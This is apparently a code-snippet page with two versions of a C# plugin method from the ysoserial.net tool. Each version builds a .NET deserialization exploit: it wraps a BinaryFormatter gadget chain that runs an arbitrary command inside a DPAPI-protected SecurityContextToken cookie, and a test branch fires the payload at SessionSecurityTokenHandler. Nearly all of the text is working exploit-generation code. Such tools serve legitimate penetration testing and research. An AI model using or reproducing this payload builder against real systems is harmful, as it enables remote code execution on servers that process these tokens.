示例#1
0
        public object Run(string[] args)
        {
            List <string> extra;

            try
            {
                extra = options.Parse(args);
            }
            catch (OptionException e)
            {
                Console.Write("ysoserial: ");
                Console.WriteLine(e.Message);
                Console.WriteLine("Try 'ysoserial --help' for more information.");
                System.Environment.Exit(-1);
            }
            String payloadValue = "";
            string payload      = @"<SecurityContextToken xmlns='http://schemas.xmlsoap.org/ws/2005/02/sc' Id='uuid-709ab608-2004-44d5-b392-f3c5bf7c67fb-1'>
	<Identifier xmlns='http://schemas.xmlsoap.org/ws/2005/02/sc'>
		urn:unique-id:securitycontext:1337
	</Identifier>
	<Cookie xmlns='http://schemas.microsoft.com/ws/2006/05/security'>{0}</Cookie>
</SecurityContextToken>";

            if (String.IsNullOrEmpty(command) || String.IsNullOrWhiteSpace(command))
            {
                Console.Write("ysoserial: ");
                Console.WriteLine("Incorrect plugin mode/arguments combination");
                Console.WriteLine("Try 'ysoserial --help' for more information.");
                System.Environment.Exit(-1);
            }

            byte[] serializedData = (byte[])new TypeConfuseDelegateGenerator().Generate(command, "BinaryFormatter", false);
            DeflateCookieTransform       myDeflateCookieTransform       = new DeflateCookieTransform();
            ProtectedDataCookieTransform myProtectedDataCookieTransform = new ProtectedDataCookieTransform();

            byte[] deflateEncoded   = myDeflateCookieTransform.Encode(serializedData);
            byte[] encryptedEncoded = myProtectedDataCookieTransform.Encode(deflateEncoded);
            payload = String.Format(payload, Convert.ToBase64String(encryptedEncoded));

            if (test)
            {
                // PoC on how it works in practice
                try
                {
                    XmlReader tokenXML = XmlReader.Create(new StringReader(payload));
                    SessionSecurityTokenHandler mySessionSecurityTokenHandler = new SessionSecurityTokenHandler();
                    mySessionSecurityTokenHandler.ReadToken(tokenXML);
                }
                catch (Exception e)
                {
                    // there will be an error!
                }
            }

            return(payload);
        }
        public object Run(string[] args)
        {
            InputArgs     inputArgs = new InputArgs();
            List <string> extra;

            try
            {
                extra = options.Parse(args);
                inputArgs.CmdFullString = command;
                inputArgs.Minify        = minify;
                inputArgs.UseSimpleType = useSimpleType;
                inputArgs.Test          = test;
            }
            catch (OptionException e)
            {
                Console.Write("ysoserial: ");
                Console.WriteLine(e.Message);
                Console.WriteLine("Try 'ysoserial -p " + Name() + " --help' for more information.");
                System.Environment.Exit(-1);
            }
            String payloadValue = "";
            string payload      = @"<SecurityContextToken xmlns='http://schemas.xmlsoap.org/ws/2005/02/sc'>
	<Identifier xmlns='http://schemas.xmlsoap.org/ws/2005/02/sc'>
		urn:unique-id:securitycontext:1
	</Identifier>
	<Cookie xmlns='http://schemas.microsoft.com/ws/2006/05/security'>{0}</Cookie>
</SecurityContextToken>";

            if (minify)
            {
                payload = XMLMinifier.Minify(payload, null, null);
            }

            if (String.IsNullOrEmpty(command) || String.IsNullOrWhiteSpace(command))
            {
                Console.Write("ysoserial: ");
                Console.WriteLine("Incorrect plugin mode/arguments combination");
                Console.WriteLine("Try 'ysoserial -p " + Name() + " --help' for more information.");
                System.Environment.Exit(-1);
            }

            byte[] serializedData = (byte[])new TextFormattingRunPropertiesGenerator().GenerateWithNoTest("BinaryFormatter", inputArgs);
            DeflateCookieTransform       myDeflateCookieTransform       = new DeflateCookieTransform();
            ProtectedDataCookieTransform myProtectedDataCookieTransform = new ProtectedDataCookieTransform();

            byte[] deflateEncoded   = myDeflateCookieTransform.Encode(serializedData);
            byte[] encryptedEncoded = myProtectedDataCookieTransform.Encode(deflateEncoded);
            payload = String.Format(payload, Convert.ToBase64String(encryptedEncoded));

            if (test)
            {
                // PoC on how it works in practice
                try
                {
                    XmlReader tokenXML = XmlReader.Create(new StringReader(payload));
                    SessionSecurityTokenHandler mySessionSecurityTokenHandler = new SessionSecurityTokenHandler();
                    mySessionSecurityTokenHandler.ReadToken(tokenXML);
                }
                catch
                {
                    // there will be an error!
                }
            }

            if (minify)
            {
                payload = XMLMinifier.Minify(payload, null, null);
            }

            return(payload);
        }